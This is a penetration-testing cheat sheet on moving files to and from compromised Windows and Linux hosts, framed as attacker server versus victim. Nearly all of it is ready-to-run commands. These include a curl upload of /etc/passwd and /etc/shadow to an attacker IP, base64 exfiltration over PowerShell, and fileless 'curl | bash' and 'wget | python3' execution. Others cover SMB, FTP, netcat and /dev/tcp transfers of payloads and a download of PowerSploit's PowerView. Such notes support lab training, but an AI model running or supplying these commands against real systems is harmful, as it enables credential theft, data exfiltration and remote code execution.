Windows File Transfer Methods
PowerShell Download
Using Net.WebClient and DownloadFile method
Copy PS C:\user> (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
PS C:\user> (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>') Using Invoke-WebRequest
Copy PS C:\user> Invoke-WebRequest '<Target File URL>' -OutFile '<Output File Name>' -UseBasicParsing | IEX Bypassing SSL error
Copy PS C:\user> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} PowerShell Upload
On the attacker server, run an upload server
Copy $ python3 -m uploadserver On the victim server, upload files to the server
Copy PS C:\user> Invoke-FileUpload -Uri http://<ATTACKER IP>/upload -File <TARGET FILE> Upload by converting to Base64
Copy PS C:\htb> $b64 = [System.convert]::ToBase64String((Get-Content -Path <TARGET FILE> -Encoding Byte))
PS C:\htb> Invoke-WebRequest -Uri http://<ATTACKER IP>/ -Method POST -Body $b64 SMB Download
Create a SMB folder on the attacker server
Copy $ sudo impacket-smbserver share -smb2support /tmp/smbshare On the victim, download files from the attacker server
Copy C:\user> copy \\<ATTACKER IP>\share\nc.exe If Windows requires a user and password set on the SMB server, set those up
Copy $ sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test Mount the drive on the victim
Copy C:\user> net use n: \\<ATTACKER IP>\share /user:test test SMB Upload
When you use SMB, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will try to connect using HTTP.
Setup a SMB over HTTP server using WebDav on the attacker server
Copy $ sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous Upload files from the victim server to the attacker server
Copy C:\user> copy <TARGET FILE> \\<ATTACKER IP>\DavWWWRoot\ FTP Download
Host FTP on the attacker server
Copy $ sudo python3 -m pyftpdlib --port 21 Download files from the victim machine
Copy PS C:\user> (New-Object Net.WebClient).DownloadFile('ftp://<ATTACKER IP>/file.txt', 'ftp-file.txt') Non-Interactive FTP download
Copy C:\user> echo open 192.168.49.128 > ftpcommand.txt
C:\user> echo USER anonymous >> ftpcommand.txt
C:\user> echo binary >> ftpcommand.txt
C:\user> echo GET file.txt >> ftpcommand.txt
C:\user> echo bye >> ftpcommand.txt
C:\user> ftp -v -n -s:ftpcommand.txt
ftp> open 192.168.49.128
Log in with USER and PASS first.
ftp> USER anonymous
ftp> GET file.txt
ftp> bye
C:\user>more file.txt
This is a test file FTP Uploads
Run an FTP server on the attacker machine
Copy $ sudo python3 -m pyftpdlib --port 21 --write Upload files from the victim machine
Copy PS C:\user> (New-Object Net.WebClient).UploadFile('ftp://<ATTACKER IP>/ftp-hosts', '<TARGET FILE>') Non-Interactive FTP upload
Copy C:\user> echo open <ATTACKER IP> > ftpcommand.txt
C:\user> echo USER anonymous >> ftpcommand.txt
C:\user> echo binary >> ftpcommand.txt
C:\user> echo PUT <TARGET FILE> >> ftpcommand.txt
C:\user> echo bye >> ftpcommand.txt
C:\user> ftp -v -n -s:ftpcommand.txt
ftp> open <ATTACKER IP>
Log in with USER and PASS first.
ftp> USER anonymous
ftp> PUT <TARGET FILE>
ftp> bye Linux File Transfer Methods
Network Downloads
Copy $ wget https://<ATTACKER IP>/file -O /tmp/file
Copy $ curl -o /tmp/LinEnum.sh https://<ATTACKER IP>/file Network Uploads
On the attacker server, run an upload server
Copy $ python3 -m pip install --user uploadserver # install uploadserver
$ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' # create a self-signed cert
$ python3 -m uploadserver 443 --server-certificate /root/server.pem # start server On the victim, upload files to the server. We need to specify insecure because we are using a self-signed cert
Copy $ curl -X POST https://<ATTACKER IP>/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure Fileless attacks
Copy $ curl https://<ATTACKER IP>/script.sh | bash
Copy $ wget -q0- https://<ATTACKER IP>/pythonfile | python3 Bash Downloads
Only works if Bash v 2.04 or greater is compiled with --enable-net-redirections
Copy $ exec 3<>/dev/tcp/10.10.10.32/80 # Connect to the target server
$ echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3 # GET request
$ cat <&3 # print response SSH/SCP Download
Copy $ scp <ATTACKER USER>@<ATTCKER IP>:/file . SSH/SCP Uploads
Copy $ scp /etc/passwd <ATTACKER USER>@<ATTACKER IP>:/ Web Servers in other languages
Copy $ python3 -m http.server
$ php -S 0.0.0.0:8000
$ ruby -run -ehttpd . -p8000 Transferring Files with Code
Python
Copy $ python2.7 -c 'import urllib;urllib.urlretrieve ("https://attacker/file", "outputfilename")'
Copy $ python3 -c 'import urllib.request;urllib.request.urlretrieve("https://attacker/file", "outputfilename")' PHP
Copy php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'
Copy php -r 'const BUFFER = 1024; $fremote =
fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
Copy php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash Ruby
Copy $ ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))' Perl
Copy $ perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");' Javascript + cscript
Save the following code as `wget.js`
Copy var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1)); Execute `wget.js` using powershell
Copy > cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1 VBScript + cscript
Save the following code as `wget.vbs`
Copy dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile WScript.Arguments.Item(1), 2
end with Execute `wget.vbs` using powershell
Copy > cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1 Misc Transfers
Nc
Victim machine ready to receive data and write to local server
Copy $ nc -l -p 8000 > /dev/shm/evil Attacker machine sending file over
Copy $ nc 192.168.49.128 8000 < evil Doing the same but over an allowed port 443
Copy $ sudo nc -l -p 443 -q 0 < /dev/shm/evil
Copy $ nc 192.168.49.128 443 > evil RDP
Copy $ rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'
Copy $ xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer